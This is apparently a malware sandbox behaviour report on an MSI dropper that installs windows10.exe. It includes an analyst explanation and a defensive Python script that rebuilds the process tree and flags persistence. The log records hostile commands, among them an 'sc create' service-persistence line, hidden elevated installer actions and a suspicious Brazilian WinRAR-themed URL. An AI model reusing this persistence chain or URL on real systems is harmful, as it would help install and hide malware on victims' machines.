Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
Source: C:\Windows\System32\msiexec.exe  Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6
Source: C:\Windows\System32\msiexec.exe  Process created: C:\Windows\Installer\MSI5DCF.tmp "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
Source: C:\Windows\System32\msiexec.exe  Process created: C:\Windows\Installer\MSI5DEF.tmp "C:\Windows\Installer\MSI5DEF.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\msiexec.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
Source: C:\Windows\Installer\MSI5DCF.tmp  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
Source: C:\Windows\System32\cmd.exe  Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\sc.exe sc start MeuServico
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2224,i,6715851174139391298,17441490298513551426,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
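The process-creation entries above record the chain an analyst cares about: msiexec.exe launches an installer custom action (MSI5DCF.tmp with /DontWait /RunAsAdmin /HideWindow) that runs Windows10.cmd through cmd.exe, and that cmd.exe uses sc.exe to register and start a service named MeuServico whose binPath is the dropped windows10.exe under the user's Pictures folder with start= auto, so the binary is relaunched by the Service Control Manager after every reboot. A separate cmd.exe opens Chrome on the winrarbrasil.from-mn.com page. The section-loaded entries further down also show windows10.exe loading starburn.dll, which is not a Windows system DLL; the report lists only the name, not the path, so whether it is side-loaded from the sample's own directory is not something these lines establish. The Python script below is an added example, not code from the Joe Sandbox report or from Joe Sandbox itself: it parses lines in the cleaned `Source: ...  Process created: ...` / `Section loaded: ...` form into a process tree and applies four illustrative rules to them. The sample input is constructed from entries copied from this report; the rule names, the deliberately tiny SYSTEM_DLLS allowlist and the USER_PROFILE prefix are this example's own assumptions.

```python
"""Rebuild the process tree from Joe Sandbox-style behaviour lines and flag the
persistence chain. Added example, not code from the report or from Joe Sandbox;
rule names, SYSTEM_DLLS and USER_PROFILE are this example's own assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: an abridged subset of the entries listed in the report.
SAMPLE = r"""
Source: C:\Windows\System32\msiexec.exe  Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6
Source: C:\Windows\System32\msiexec.exe  Process created: C:\Windows\Installer\MSI5DCF.tmp "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
Source: C:\Windows\System32\msiexec.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
Source: C:\Windows\Installer\MSI5DCF.tmp  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\sc.exe sc start MeuServico
Source: C:\Windows\System32\cmd.exe  Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Section loaded: version.dll
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Section loaded: starburn.dll
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Section loaded: kernel.appcore.dll
"""

LINE_RE = re.compile(r"^Source:\s+(?P<src>.+?)\s+(?P<kind>Process created|Section loaded):\s+(?P<detail>.+)$")
# child image = first drive-letter path ending in .exe/.tmp/.cmd; the rest is its command line
IMAGE_RE = re.compile(r"^(?P<image>[A-Za-z]:\\.*?\.(?:exe|tmp|cmd))(?:\s+(?P<cmdline>.*))?$", re.IGNORECASE)
BINPATH_RE = re.compile(r'binpath=\s*(?:"([^"]+)"|(\S+))', re.IGNORECASE)
SYSTEM_DLLS = {"apphelp.dll", "version.dll", "kernel.appcore.dll", "uxtheme.dll"}  # assumed allowlist
USER_PROFILE = "c:\\users\\"  # assumed: everything under here is user-writable


@dataclass
class Event:
    source: str    # process that performed the action
    kind: str      # "Process created" or "Section loaded"
    image: str     # child image path, or the DLL name for section loads
    cmdline: str = ""


def parse(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src, kind, detail = m.group("src"), m.group("kind"), m.group("detail").strip()
        if kind == "Section loaded":
            events.append(Event(src, kind, detail))
            continue
        im = IMAGE_RE.match(detail)
        if im:
            events.append(Event(src, kind, im.group("image"), im.group("cmdline") or ""))
        else:  # e.g. "unknown unknown": the sandbox could not resolve the child
            first, _, rest = detail.partition(" ")
            events.append(Event(src, kind, first, rest))
    return events


def process_tree(events):
    """Map each parent image to the child images it spawned, in report order."""
    tree = defaultdict(list)
    for e in events:
        if e.kind == "Process created":
            tree[e.source].append(e.image)
    return dict(tree)


def roots(tree):
    """Parents that never appear as anybody's child."""
    children = {c for kids in tree.values() for c in kids}
    return [p for p in tree if p not in children]


def render(tree, node, depth=0, seen=frozenset()):
    """Indented tree; 'seen' stops the self-spawning loops windows10.exe shows."""
    lines = ["  " * depth + node]
    if node in seen:
        return lines
    for child in tree.get(node, []):
        lines.extend(render(tree, child, depth + 1, seen | {node}))
    return lines


def under_user_profile(path):
    return path.lower().startswith(USER_PROFILE)


def analyse(events):
    """Return (rule, source, detail) tuples for the behaviours worth alerting on."""
    findings = []
    for e in events:
        src_name = e.source.lower().rsplit("\\", 1)[-1]
        if e.kind == "Section loaded":
            if e.image.lower() not in SYSTEM_DLLS:
                findings.append(("non-system-dll-loaded", e.source, e.image))
            continue
        low, image = e.cmdline.lower(), e.image.lower()
        # sc.exe registering or reconfiguring a service whose binary lives in a user-writable directory
        if image.endswith("\\sc.exe") and (" create " in low or " config " in low):
            m = BINPATH_RE.search(e.cmdline)
            binpath = (m.group(1) or m.group(2)) if m else ""
            if under_user_profile(binpath):
                findings.append(("service-binpath-in-user-profile", e.source, binpath))
        # MSI custom action launched elevated and with its window hidden
        if src_name == "msiexec.exe" and image.endswith(".tmp") and "/runasadmin" in low:
            findings.append(("msi-custom-action-runasadmin", e.source, e.image))
        # the installer starting an executable it dropped into the user profile
        if src_name == "msiexec.exe" and under_user_profile(e.image):
            findings.append(("installer-launched-user-profile-exe", e.source, e.image))
    return findings


if __name__ == "__main__":
    evs = parse(SAMPLE)
    tree = process_tree(evs)
    for root in roots(tree):
        print("\n".join(render(tree, root)))
    for rule, source, detail in analyse(evs):
        print(f"[{rule}] {source} -> {detail}")
```

Run as-is it prints the tree rooted at C:\Windows\System32\msiexec.exe (and a second root for the cmd.exe that launched Chrome, since nothing in the sample spawns it) followed by the four findings; feed parse() the cleaned behaviour lines of a full report to run it over the real thing. The DLL rule only makes sense with a real catalogue of Windows system DLLs; the tiny allowlist here exists to show how starburn.dll stands out among the loader's other imports, not to classify arbitrary DLLs.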
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: slc.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
